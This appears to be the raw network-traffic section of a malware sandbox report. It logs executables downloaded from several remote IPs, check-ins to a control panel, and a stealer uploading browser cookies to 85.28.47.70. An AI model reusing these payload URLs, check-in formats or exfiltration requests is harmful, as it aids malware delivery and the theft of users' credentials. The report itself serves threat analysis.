00 00 00 00 00 00 00 00 00 00 00 00 00 e5 44 7e a2 00 3b b2 00 b0 5d e9 31 8f f9 93 21 48 bb c8 07 4e 8e 49 90 ab 4e 96 97 1e 65 cc 46 b4 f4 58 0b fb 1c 17 06 56 3a 1c a3 d5 fc f3 1a 29 ab ce 5d 22 d2 dc 66 53 5a a6 7b 66 15 c6 9f f4 a7 50 51 41 65 53 7e 17 a4 c3 1a 27 5e 96 3a ab 6b cb 3b 9d 45 f1 1f fa 58 ab ac e3 03 93 4b 30 fa 55 20 76 6d f6 ad cc 76 91 88 02 4c 25 f5 e5 d7 fc 4f 2a cb d7 c5 35 44 80 26 62 a3 8f b5 b1 5a 49 de ba 1b 67 25 ea 0e 98 45 fe c0 e1 5d 2f 75 02 c3 4c f0 12 81 46 97 a3 8d d3 f9 c6 6b 8f 5f e7 03 92 9c 95 15 6d 7a eb bf 52 59 da 95 be 83 2d d4 74 21 d3 58 e0 69 29 49 c
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Jul 2024 05:09:04 GMTContent-Type: application/octet-streamContent-Length: 922112Last-Modified: Fri, 12 Jul 2024 08:46:23 GMTConnection: keep-aliveETag: "6690ed5f-e1200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 85 f4 5a 70 c1 95 34 23 c1 95 34 23 c1 95 34 23 12 e7 37 22 cc 95 34 23 12 e7 31 22 70 95 34 23 12 e7 30 22 d6 95 34 23 93 e0 30 22 d0 95 34 23 93 e0 37 22 d6 95 34 23 93 e0 31 22 95 95 34 23 12 e7 35 22 d0 95 34 23 c1 95 35 23 1e 95 34 23 09 e0 30 22 c0 95 34 23 09 e0 31 22 c8 95 34 23 09 e0 36 22 c0 95 34 23 52 69 63 68 c1 95 34 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 57 ed 90 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f0 0b 00 00 32 02 00 00 00 00 00 68 11 0a 00 00 10 00 00 00 00 0c 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0e 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 81 0d 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 f4 67 00 00 cc 5a 0d 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 5b 0d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 ac 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c ef 0b 00 00 10 00 00 00 f0 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 90 01 00 00 00 0c 00 00 92 01 00 00 f4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 30 37 00 00 00 a0 0d 00 00 24 00 00 00 86 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 f4 67 00 00 00 e0 0d 00 00 68 00 00 00 aa 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Jul 2024 05:09:17 GMTContent-Type: application/octet-streamContent-Length: 550912Last-Modified: Fri, 12 Jul 2024 08:28:21 GMTConnection: keep-aliveETag: "6690e925-86800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 41 fd 6e b8 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 ac 02 00 00 ba 05 00 00 00 00 00 de ca 02 00 00 20 00 00 00 e0 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 ca 02 00 57 00 00 00 00 e0 02 00 62 b6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 aa 02 00 00 20 00 00 00 ac 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 62 b6 05 00 00 e0 02 00 00 b8 05 00 00 ae 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 08 00 00 02 00 00 00 66 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 ca 02 00 00 00 00 00 48 00 00 00 02 00 05 00 ac a0 01 00 d8 29 01 00 09 00 00 00 45 03 00 06 0c 82 01 00 a0 1e 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e5 44 7e a2 00 3b b2 00 b0 5d e9 31 8f f9 93 21 48 bb c8 07 4e 8e 49 90 ab 4e 96 97 1e 65 cc 46 b4 f4 58 0b fb 1c 17 06 56 3a 1c a3 d5 fc f3 1a 29 ab ce 5d 22 d2 dc 66 53 5a a6 7b 66 15 c6 9f f4 a7 50 51 41 65 53 7e 17 a4 c3 1a 27 5e 96 3a ab 6b cb 3b 9d 45 f1 1f fa 58 ab ac e3 03 93 4b 30 fa 55 20 76 6d f6 ad cc 76 91 88 02 4c 25 f5 e5 d7 fc 4f 2a cb d7 c5 35 44 80 26 62 a3 8f b5 b1 5a 49 de ba 1b 67 25 ea 0e 98 45 fe c0 e1 5d 2f 75 02 c3 4c f0 12 81 46 97 a3 8d d3 f9 c6 6b 8f 5f e7 03 92 9c 95 15 6d 7a eb bf 52 59 da 95 be 83 2d d4 74 21 d3 58 e0 69 29 49 c
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 13 Jul 2024 05:09:18 GMTContent-Type: application/octet-streamContent-Length: 2981888Last-Modified: Fri, 12 Jul 2024 08:35:16 GMTConnection: keep-aliveETag: "6690eac4-2d8000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 3b 90 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 38 2e 00 00 0e 00 00 00 00 00 00 00 80 78 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 78 00 00 04 00 00 cc a9 2d 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6d 80 2e 00 95 00 00 00 00 60 2e 00 13 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 2e 00 00 20 00 00 00 32 11 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 13 0b 00 00 00 60 2e 00 00 06 00 00 00 52 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 2e 00 00 02 00 00 00 58 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2d 00 00 a0 2e 00 00 02 00 00 00 5a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6e 67 65 7a 75 79 75 00 00 1c 00 00 60 5c 00 00 00 1c 00 00 5c 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6e 75 72 67 65 7a 6d 00 20 00 00 00 60 78 00 00 02 00 00 00 5c 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 78 00 00 22 00 00 00 5e 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: GET /tmp/1.exe HTTP/1.1Host: foodbook.live
                                Source: global trafficHTTP traffic detected: GET /v2/?request=displayproxies&protocol=socks4&timeout=10000&country=all&ssl=all&anonymity=all HTTP/1.1Host: api.proxyscrape.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 31 34 32 43 41 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CDF1A142CAFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                Source: global trafficHTTP traffic detected: GET /lend/leg222.exe HTTP/1.1Host: 77.91.77.81
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 36 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000160001&unit=246122658369
                                Source: global trafficHTTP traffic detected: GET /cdn-directory/gold543.exe HTTP/1.1Host: 185.216.214.217
                                Source: global trafficHTTP traffic detected: GET /cdn-directory/gold543.exe HTTP/1.1Host: 185.216.214.217
                                Source: global trafficHTTP traffic detected: GET /cdn-directory/gold543.exe HTTP/1.1Host: 185.216.214.217
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000192001&unit=246122658369
                                Source: global trafficHTTP traffic detected: GET /cdn-directory/wev233v22.exe HTTP/1.1Host: 185.216.214.217
                                Source: global trafficHTTP traffic detected: GET /cdn-directory/wev233v22.exe HTTP/1.1Host: 185.216.214.217
                                Source: global trafficHTTP traffic detected: GET /cdn-directory/wev233v22.exe HTTP/1.1Host: 185.216.214.217
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 39 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000193001&unit=246122658369
                                Source: global trafficHTTP traffic detected: GET /large/hello.exe HTTP/1.1Host: 77.232.41.110
                                Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000202001&unit=246122658369
                                Source: global trafficHTTP traffic detected: POST /570d5d5e8678366c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEHHost: 85.28.47.70Content-Length: 212Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 43 44 32 46 36 44 46 42 35 45 31 35 37 33 35 33 32 31 30 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 68 65 6c 6c 6f 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 2d 2d 0d 0a Data Ascii: ------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="hwid"F0CD2F6DFB5E1573532102------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="build"hello------AFIDGDBGCAAFIDHIJKEH--
                                Source: global trafficHTTP traffic detected: GET /lend/build16666.exe HTTP/1.1Host: 77.91.77.81
                                Source: global trafficHTTP traffic detected: POST /570d5d5e8678366c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAAHost: 85.28.47.70Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 2d 2d 0d 0a Data Ascii: ------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="message"browsers------KKEHIEBKJKFIEBGDGDAA--
                                Source: global trafficHTTP traffic detected: POST /570d5d5e8678366c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKFBKKECFHJKEBKEHIHost: 85.28.47.70Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------KKJKFBKKECFHJKEBKEHIContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------KKJKFBKKECFHJKEBKEHIContent-Disposition: form-data; name="message"plugins------KKJKFBKKECFHJKEBKEHI--
                                Source: global trafficHTTP traffic detected: POST /570d5d5e8678366c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHJEBFBFHJECAKFCAAKHost: 85.28.47.70Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 2d 2d 0d 0a Data Ascii: ------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="message"fplugins------HDHJEBFBFHJECAKFCAAK--
                                Source: global trafficHTTP traffic detected: POST /570d5d5e8678366c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDAHost: 85.28.47.70Content-Length: 6779Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /663cea891445d733/sqlite3.dll HTTP/1.1Host: 85.28.47.70Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /570d5d5e8678366c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDAHost: 85.28.47.70Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 32 65 61 36 36 30 39 30 34 37 31 61 39 63 33 66 32 33 37 61 35 33 36 34 61 64 61 30 61 63 35 37 39 65 63 61 33 66 65 34 66 37 31 64 34 65 38 34 30 66 38 37 66 34 31 63 38 31 31 38 33 38 33 65 62 63 39 66 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 2d 2d 0d 0a Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="token"622ea66090471a9c3f237a5364ada0ac579eca3fe4f71d4e840f87f41c8118383ebc9f20------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12
